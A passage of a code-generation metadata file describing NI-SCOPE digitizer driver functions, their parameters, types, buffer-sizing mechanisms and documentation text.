'description': '\nQueries the value of a ViInt64 attribute. You can use this function to\nget the values of instrument-specific attributes and inherent IVI\nattributes. If the attribute represents an instrument state, this\nfunction performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'out',
'documentation': {
'description': 'Returns the current value of the attribute.'
},
'name': 'value',
'type': 'ViInt64'
}
],
'returns': 'ViStatus'
},
'GetAttributeViReal64': {
'codegen_method': 'private',
'documentation': {
'description': '\nQueries the value of a ViReal64 attribute. You can use this function to\nget the values of instrument-specific attributes and inherent IVI\nattributes. If the attribute represents an instrument state, this\nfunction performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the current value of the attribute; pass the address of a\nViReal64 variable.\n'
},
'name': 'value',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'GetAttributeViSession': {
'codegen_method': 'no',
'documentation': {
'description': '\nQueries the value of a ViSession attribute. You can use this function to\nget the values of instrument-specific attributes and inherent IVI\nattributes. If the attribute represents an instrument state, this\nfunction performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the current value of the attribute; pass the address of a\nViSession variable.\n'
},
'name': 'value',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'GetAttributeViString': {
'codegen_method': 'private',
'documentation': {
'description': '\nQueries the value of a ViString attribute. You can use this function to\nget the values of instrument-specific attributes and inherent IVI\nattributes. If the attribute represents an instrument state, this\nfunction performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid.\n\nYou must provide a ViChar array to serve as a buffer for the value. You\npass the number of bytes in the buffer as the **bufSize**. If the\ncurrent value of the attribute, including the terminating NUL byte, is\nlarger than the size you indicate in the **bufSize**, the function\ncopies (**bufSize** – 1) bytes into the buffer, places an ASCII NUL byte\nat the end of the buffer, and returns the **bufSize** you must pass to\nget the entire value. For example, if the value is 123456 and the\n**bufSize** is 4, the function places 123 into the buffer and returns 7.\nIf you want to call this function just to get the required buffer size,\nyou can pass 0 for the **bufSize** and VI_NULL for the **value**.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': 'The number of bytes in the ViChar array you specify for **value**.'
},
'name': 'bufSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nThe buffer in which the function returns the current value of the\nattribute; the buffer must be of type ViChar and have at least as many\nbytes as indicated in the **bufSize**.\n'
},
'name': 'value',
'size': {
'mechanism': 'ivi-dance',
'value': 'bufSize'
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'GetChannelName': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns the channel string that is in the channel table at an index you\nspecify. Not applicable to National Instruments digitizers.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'A 1-based index into the channel table.'
},
'name': 'index',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nPasses the number of bytes in the ViChar array you specify for the\n**description** parameter.\n\nIf the error description, including the terminating NULL byte, contains\nmore bytes than you indicate in this parameter, the function copies\nBufferSize - 1 bytes into the buffer, places an ASCII NULL byte at the\nend of the buffer, and returns the buffer size you must pass to get the\nentire value. For example, if the value is "123456" and the Buffer Size\nis 4, the function places "123" into the buffer and returns 7.\n\nIf you pass a negative number, the function copies the value to the\nbuffer regardless of the number of bytes in the value.\n'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the channel string that is in the channel table at the index you\nspecify. Do not modify the contents of the channel string.\n'
},
'name': 'channelString',
'size': {
'mechanism': 'python-code',
'value': None
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'GetChannelNameFromString': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'name': 'index',
'type': 'ViConstString'
},
{
'direction': 'in',
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'name': 'name',
'size': {
'mechanism': 'ivi-dance',
'value': 'bufferSize'
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'GetEqualizationFilterCoefficients': {
'codegen_method': 'private',
'documentation': {
'description': '\nRetrieves the custom coefficients for the equalization FIR filter on the\ndevice. This filter is designed to compensate the input signal for\nartifacts introduced to the signal outside of the digitizer. Because\nthis filter is a generic FIR filter, any coefficients are valid.\nCoefficient values should be between +1 and –1.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channel',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The number of coefficients being passed in the **coefficients** array.'
},
'name': 'numberOfCoefficients',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nThe custom coefficients for the equalization FIR filter on the device.\nThese coefficients should be between +1 and –1. You can obtain the\nnumber of coefficients from the\n`NISCOPE_ATTR_EQUALIZATION_NUM_COEFFICIENTS <cviNISCOPE_ATTR_EQUALIZATION_NUM_COEFFICIENTS.html>`__\nattribute.\n'
},
'name': 'coefficients',
'size': {
'mechanism': 'passed-in',
'value': 'numberOfCoefficients'
},
'type': 'ViReal64[]'
}
],
'returns': 'ViStatus'
},
'GetError': {
'codegen_method': 'private',
'documentation': {
'description': '\nReads an error code and message from the error queue. National\nInstruments digitizers do not contain an error queue. Errors are\nreported as they occur. Therefore, this function does not detect errors.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'is_error_handling': True,
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nPasses the number of bytes in the ViChar array you specify for the\nDescription parameter.\n\nIf the error description, including the terminating NULL byte, contains\nmore bytes than you indicate in this parameter, the function copies\n**bufferSize** – 1 bytes into the buffer, places an ASCII NULL byte at\nthe end of the buffer, and returns the buffer size you must pass to get\nthe entire value. For example, if the value is "123456" and the Buffer\nSize is 4, the function places "123" into the buffer and returns 7.\n\nIf you pass a negative number, the function copies the value to the\nbuffer regardless of the number of bytes in the value.\n\nIf you pass 0, you can pass VI_NULL for the **description** parameter.\n'
},
'name': 'errorCode',
'type': 'ViStatus'
},
{
'direction': 'in',
'documentation': {
'description': '\nPass the Error Code that is returned from any of the instrument driver\nfunctions.\n'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the error description for the IVI session or execution thread.\n\nIf there is no description, the function returns an empty string. The\nbuffer must contain at least as many elements as the value you specify\nwith the Buffer Size parameter.\n\nIf you pass 0 for the **bufferSize**, you can pass VI_NULL for this\nparameter.\n'
},
'name': 'description',
'size': {
'mechanism': 'ivi-dance',
'value': 'bufferSize'
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus',
'use_session_lock': False
},
'GetErrorMessage': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns the error code from an NI-SCOPE function as a user-readable\nstring. Use VI_NULL as the default instrument handle.\n\nYou must call this function twice. For the first call, set\n**bufferSize** to 0 to prevent the function from populating the error\nmessage. Instead, the function returns the size of the error string. Use\nthe returned size to create a buffer, then call the function again,\npassing in the new buffer and setting **bufferSize** equal to the size\nthat was returned in the first function call.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe error code that is returned from any of the instrument driver\nfunctions.\n'
},
'name': 'errorCode',
'type': 'ViStatus'
},
{
'direction': 'in',
'documentation': {
'description': 'The number of characters you specify for the **errorMessage** parameter.'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns a char buffer that will be populated with the error message. It\nshould be at least as large as the buffer size.\n'
},
'name': 'errorMessage',
'size': {
'mechanism': 'ivi-dance',
'value': 'bufferSize'
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'GetFrequencyResponse': {
'codegen_method': 'no',
'documentation': {
'description': '\nGets the frequency response of the digitizer for the current\nconfigurations of the channel attributes. Not all digitizers support\nthis function.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channel',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe array size for the frequencies, amplitudes, and phases arrays that\nyou pass in to the other parameters.\n\nTo determine the sizes of the buffers to allocate for the frequencies,\namplitudes, and phases arrays, pass a value of 0 to the **buffer_size**\nparameter and a value of NULL to the **frequencies** parameter. In this\ncase, the value returned by the **numberOfFrequencies** parameter is the\nsize of the arrays necessary to hold the frequencies, amplitudes, and\nphases. Allocate three arrays of this size, then call this function\nagain (with correct **buffer_size** parameter) to retrieve the actual\nvalues.\n'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nThe array of frequencies that corresponds with the amplitude and phase\nresponse of the device.\n'
},
'name': 'frequencies',
'size': {
'mechanism': 'passed-in',
'value': 'bufferSize'
},
'type': 'ViReal64[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
'description': '\nThe array of amplitudes that correspond with the magnitude response of\nthe device.\n'
},
'name': 'amplitudes',
'size': {
'mechanism': 'passed-in',
'value': 'bufferSize'
},
'type': 'ViReal64[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
'description': '\nThe array of phases that correspond with the phase response of the\ndevice.\n'
},
'name': 'phases',
'size': {
'mechanism': 'passed-in',
'value': 'bufferSize'
},
'type': 'ViReal64[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
'description': 'Returns the number of frequencies in the returned spectrum.'
},
'name': 'numberOfFrequencies',
'type': 'ViInt32',
'use_in_python_api': False
}
],
'returns': 'ViStatus'
},
'GetNextCoercionRecord': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns the coercion information associated with the IVI session. This\nfunction retrieves and clears the oldest instance in which the\ninstrument driver coerced a value you specified to another value.\n\nIf you set NISCOPE_ATTR_RECORD_COERCIONS to VI_TRUE, NI-SCOPE keeps\na list of all coercions it makes on ViInt32 or ViReal64 values that you\npass to instrument driver functions. Use this function to retrieve\ninformation from that list.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nPasses the number of bytes in the ViChar array you specify for the\nDescription parameter.\n\nIf the error description, including the terminating NULL byte, contains\nmore bytes than you indicate in this parameter, the function copies\n**bufferSize** – 1 bytes into the buffer, places an ASCII NULL byte at\nthe end of the buffer, and returns the buffer size you must pass to get\nthe entire value. For example, if the value is "123456" and the\n**bufferSize** is 4, the function places "123" into the buffer and\nreturns 7.\n\nIf you pass a negative number, the function copies the value to the\nbuffer regardless of the number of bytes in the value.\n\nIf you pass 0, you can pass VI_NULL for the Description buffer\nparameter.\n'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the next coercion record for the IVI session. If there are no\ncoercions records, the function returns an empty string. The buffer must\ncontain at least as many elements as the value you specify with the\n**bufferSize** parameter.\n'
},
'name': 'record',
'size': {
'mechanism': 'ivi-dance',
'value': 'bufferSize'
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'GetNextInterchangeWarning': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns the interchangeability warnings associated with the IVI session.\nIt retrieves and clears the oldest instance in which the class driver\nrecorded an interchangeability warning. Interchangeability warnings\nindicate that using your application with a different instrument might\ncause different behavior.\n\nUse this function to retrieve interchangeability warnings. The driver\nperforms interchangeability checking when\nNISCOPE_ATTR_INTERCHANGE_CHECK is set to VI_TRUE. The function\nreturns an empty string in the **interchangeWarning** parameter if no\ninterchangeability warnings remain for the session.\n\nIn general, the instrument driver generates interchangeability warnings\nwhen an attribute that affects the behavior of the instrument is in a\nstate that you did not specify.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nPasses the number of bytes in the ViChar array you specify for the\n**Description** parameter.\n\nIf the error description, including the terminating NULL byte, contains\nmore bytes than you indicate in this parameter, the function copies\n**bufferSize**; – 1 bytes into the buffer, places an ASCII NULL byte at\nthe end of the buffer, and returns the buffer size you must pass to get\nthe entire value. For example, if the value is "123456" and the Buffer\nSize is 4, the function places "123" into the buffer and returns 7.\n\nIf you pass a negative number, the function copies the value to the\nbuffer regardless of the number of bytes in the value.\n\nIf you pass 0, you can pass VI_NULL for the Description buffer\nparameter.\n'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the next interchange warning for the IVI session. If there are\nno interchange warnings, the function returns an empty string. The\nbuffer must contain at least as many elements as the value you specify\nwith the **bufferSize** parameter.\n'
},
'name': 'interchangeWarning',
'size': {
'mechanism': 'ivi-dance',
'value': 'bufferSize'
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'GetNormalizationCoefficients': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns coefficients that can be used to convert binary data to\nnormalized and calibrated data.\n\nRefer to `Scaling and Normalization of Binary\nData <Digitizers.chm::/scaling_and_norm_binary_data.html>`__ for more\ninformation about how to use this function.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe array size for the **coefficentInfo** parameter.\n\nTo determine the size of the buffer to allocate for **coefficientInfo**,\npass a value of 0 to the **buffersize** parameter and a value of NULL to\nthe **coefficientInfo** parameter. In this case, the return value of the\n**numberOfCoefficientSets** parameter is the size of the array necessary\nto hold the coefficient structures. Allocate an array of\nniScope_coefficientInfo structures of this size, then call this\nfunction again (with the correct **bufferSize** parameter) to retrieve\nthe actual values.\n'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nAn array of structures containing gain and offset coefficients for a\ngiven channel.\n'
},
'name': 'coefficientInfo',
'size': {
'mechanism': 'ivi-dance-with-a-twist',
'value': 'bufferSize',
'value_twist': 'numberOfCoefficientSets'
},
'type': 'niScope_coefficientInfo[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the number of coefficient sets returned in the\n**coefficientInfo** array.\n'
},
'name': 'numberOfCoefficientSets',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'GetScalingCoefficients': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns coefficients that can be used to scale binary data to volts.\n\nRefer to `Scaling and Normalization of Binary\nData <Digitizers.chm::/scaling_and_norm_binary_data.html>`__ for more\ninformation about how to use this function.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe array size for the **coefficentInfo** parameter.\n\nTo determine the size of the buffer to allocate for **coefficientInfo**,\npass a value of 0 to the **buffersize** parameter and a value of NULL to\nthe **coefficientInfo** parameter. In this case, the return value of the\n**numberOfCoefficientSets** parameter is the size of the array necessary\nto hold the coefficient structures. Allocate an array of\nniScope_coefficientInfo structures of this size, then call this\nfunction again (with the correct **bufferSize** parameter) to retrieve\nthe actual values.\n'
},
'name': 'bufferSize',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nAn array of structures containing gain and offset coefficients for a\ngiven channel.\n'
},
'name': 'coefficientInfo',
'size': {
'mechanism': 'ivi-dance-with-a-twist',
'value': 'bufferSize',
'value_twist': 'numberOfCoefficientSets'
},
'type': 'niScope_coefficientInfo[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the number of coefficient sets returned in the\n**coefficientInfo** array.\n'
},
'name': 'numberOfCoefficientSets',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'GetStreamEndpointHandle': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns a writer endpoint that can be used with NI-P2P to configure a\npeer-to-peer stream with a digitizer endpoint.\n\n- `Peer-to-Peer Streaming <digitizers.chm::/5160_P2P.html>`__\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe stream endpoint FIFO to configure. Refer to the device-specific\ndocumentation for peer-to-peer streaming in the *High-Speed Digitizers\nHelp* for more information.\n'
},
'name': 'streamName',
'type': 'ViConstString'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns a reference to a peer-to-peer writer FIFO that can be used to\ncreate a peer-to-peer streaming session.\n'
},
'name': 'writerHandle',
'type': 'ViUInt32'
}
],
'returns': 'ViStatus'
},
'ImportAttributeConfigurationBuffer': {
'documentation': {
'description': '\nImports an attribute configuration to the session from the specified\nconfiguration buffer.\n\nYou can export and import session attribute configurations only between\ndevices with identical model numbers, channel counts, and onboard memory\nsizes.\n\n**Related Topics:**\n\n`Attributes and Attribute\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(attributes_and_attribute_functions)>`__\n\n`Setting Attributes Before Reading\nAttributes <REPLACE_DRIVER_SPECIFIC_URL_1(setting_before_reading_attributes)>`__\n',
'note': '\nYou cannot call this function while the session is in a running state,\nsuch as while acquiring a signal.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the size, in bytes, of the byte array to import. If you enter\n0, this function returns the needed size.\n'
},
'name': 'sizeInBytes',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the byte array buffer that contains the attribute\nconfiguration to import.\n'
},
'name': 'configuration',
'size': {
'mechanism': 'len',
'value': 'sizeInBytes'
},
'type': 'ViInt8[]'
}
],
'returns': 'ViStatus'
},
'ImportAttributeConfigurationFile': {
'documentation': {
'description': '\nImports an attribute configuration to the session from the specified\nfile.\n\nYou can export and import session attribute configurations only between\ndevices with identical model numbers, channel counts, and onboard memory\nsizes.\n\n**Related Topics:**\n\n`Attributes and Attribute\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(attributes_and_attribute_functions)>`__\n\n`Setting Attributes Before Reading\nAttributes <REPLACE_DRIVER_SPECIFIC_URL_1(setting_before_reading_attributes)>`__\n',
'note': '\nYou cannot call this function while the session is in a running state,\nsuch as while acquiring a signal.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the absolute path to the file containing the attribute\nconfiguration to import. If you specify an empty or relative path, this\nfunction returns an error.\n**Default File Extension:** .niscopeconfig\n'
},
'name': 'filePath',
'type': 'ViConstString'
}
],
'returns': 'ViStatus'
},
'InitWithOptions': {
'codegen_method': 'private',
'documentation': {
'description': '\nPerforms the following initialization actions:\n\n- Creates a new IVI instrument driver and optionally sets the initial\n state of the following session properties: Range Check, Cache,\n Simulate, Record Value Coercions\n- Opens a session to the specified device using the interface and\n address you specify for the **resourceName**\n- Resets the digitizer to a known state if **resetDevice** is set to\n VI_TRUE\n- Queries the instrument ID and verifies that it is valid for this\n instrument driver if the **IDQuery** is set to VI_TRUE\n- Returns an instrument handle that you use to identify the instrument\n in all subsequent instrument driver function calls\n'
},
'method_name_for_documentation': '__init__',
'parameters': [
{
'direction': 'in',
'documentation': {
'caution': '\nTraditional NI-DAQ and NI-DAQmx device names are not case-sensitive.\nHowever, all IVI names, such as logical names, are case-sensitive. If\nyou use logical names, driver session names, or virtual names in your\nprogram, you must make sure that the name you use matches the name in\nthe IVI Configuration Store file exactly, without any variations in the\ncase of the characters.\n',
'description': '\n| Specifies the resource name of the device to initialize\n\nFor Traditional NI-DAQ devices, the syntax is DAQ::\\ *n*, where *n* is\nthe device number assigned by MAX, as shown in Example 1.\n\nFor NI-DAQmx devices, the syntax is just the device name specified in\nMAX, as shown in Example 2. Typical default names for NI-DAQmx devices\nin MAX are Dev1 or PXI1Slot1. You can rename an NI-DAQmx device by\nright-clicking on the name in MAX and entering a new name.\n\nAn alternate syntax for NI-DAQmx devices consists of DAQ::NI-DAQmx\ndevice name, as shown in Example 3. This naming convention allows for\nthe use of an NI-DAQmx device in an application that was originally\ndesigned for a Traditional NI-DAQ device. For example, if the\napplication expects DAQ::1, you can rename the NI-DAQmx device to 1 in\nMAX and pass in DAQ::1 for the resource name, as shown in Example 4.\n\nIf you use the DAQ::\\ *n* syntax and an NI-DAQmx device name already\nexists with that same name, the NI-DAQmx device is matched first.\n\nYou can also pass in the name of an IVI logical name or an IVI virtual\nname configured with the IVI Configuration utility, as shown in Example\n5. A logical name identifies a particular virtual instrument. A virtual\nname identifies a specific device and specifies the initial settings for\nthe session.\n',
'table_body': [
[
'1',
'Traditional NI-DAQ device',
'DAQ::1 (1 = device number)'
],
[
'2',
'NI-DAQmx device',
'myDAQmxDevice (myDAQmxDevice = device name)'
],
[
'3',
'NI-DAQmx device',
'DAQ::myDAQmxDevice (myDAQmxDevice = device name)'
],
[
'4',
'NI-DAQmx device',
'DAQ::2 (2 = device name)'
],
[
'5',
'IVI logical name or IVI virtual name',
'myLogicalName (myLogicalName = name)'
]
],
'table_header': [
'Example',
'Device Type',
'Syntax'
]
},
'name': 'resourceName',
'type': 'ViRsrc'
},
{
'default_value': False,
'direction': 'in',
'documentation': {
'description': '\nSpecify whether to perform an ID query.\n\nWhen you set this parameter to VI_TRUE, NI-SCOPE verifies that the\ndevice you initialize is a type that it supports.\n\nWhen you set this parameter to VI_FALSE, the function initializes the\ndevice without performing an ID query.\n\n**Defined Values**\n\n| VI_TRUE—Perform ID query\n| VI_FALSE—Skip ID query\n\n**Default Value**: VI_TRUE\n'
},
'name': 'idQuery',
'type': 'ViBoolean'
},
{
'default_value': False,
'direction': 'in',
'documentation': {
'description': '\nSpecify whether to reset the device during the initialization process.\n\nDefault Value: VI_TRUE\n\n**Defined Values**\n\nVI_TRUE (1)—Reset device\n\nVI_FALSE (0)—Do not reset device\n',
'note': '\nFor the NI 5112, repeatedly resetting the device may cause excessive\nwear on the electromechanical relays. Refer to `NI 5112\nElectromechanical Relays <REPLACE_DRIVER_SPECIFIC_URL_1(5112_relays)>`__\nfor recommended programming practices.\n'
},
'name': 'resetDevice',
'type': 'ViBoolean'
},
{
'default_value': '""',
'direction': 'in',
'documentation': {
'description': '\n| Specifies initialization commands. The following table lists the\n attributes and the name you use in the **optionString** to identify\n the attribute.\n\nDefault Values: "Simulate=0,RangeCheck=1,QueryInstrStatus=1,Cache=1"\n\nYou can use the option string to simulate a device. The DriverSetup flag\nspecifies the model that is to be simulated and the type of the model.\nOne example to simulate an NI PXI-5102 would be as follows:\n\nOption String: Simulate = 1, DriverSetup = Model:5102; BoardType:PXI\n\nRefer to the example niScope EX Simulated Acquisition for more\ninformation on simulation.\n\nYou can also use the option string to attach an accessory such as the\nNI 5900 to your digitizer session to allow the seamless use of the\naccessory:\n\nOption String: DriverSetup = Accessory:Dev1\n\nRefer to the example niScope EX External Amplifier for more information.\n',
'table_body': [
]
},
'name': 'optionString',
'python_api_converter_name': 'convert_init_with_options_dictionary',
'type': 'ViConstString',
'type_in_documentation': 'dict'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns a session handle that you can use to identify the device in all\nsubsequent NI-SCOPE function calls.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus',
'use_session_lock': False
},
'InitiateAcquisition': {
'codegen_method': 'private',
'documentation': {
'description': '\nInitiates a waveform acquisition.\n\nAfter calling this function, the digitizer leaves the Idle state and\nwaits for a trigger. The digitizer acquires a waveform for each channel\nyou enable with niScope_ConfigureVertical.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'IsDeviceReady': {
'codegen_method': 'no',
'documentation': {
'description': '\nCall this function to determine whether the device is ready for use or\nthe device is still undergoing initialization.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'caution': '\nTraditional NI-DAQ and NI-DAQmx device names are not case-sensitive.\nHowever, all IVI names, such as logical names, are case-sensitive. If\nyou use logical names, driver session names, or virtual names in your\nprogram, you must make sure that the name you use matches the name in\nthe IVI Configuration Store file exactly, without any variations in the\ncase of the characters.\n',
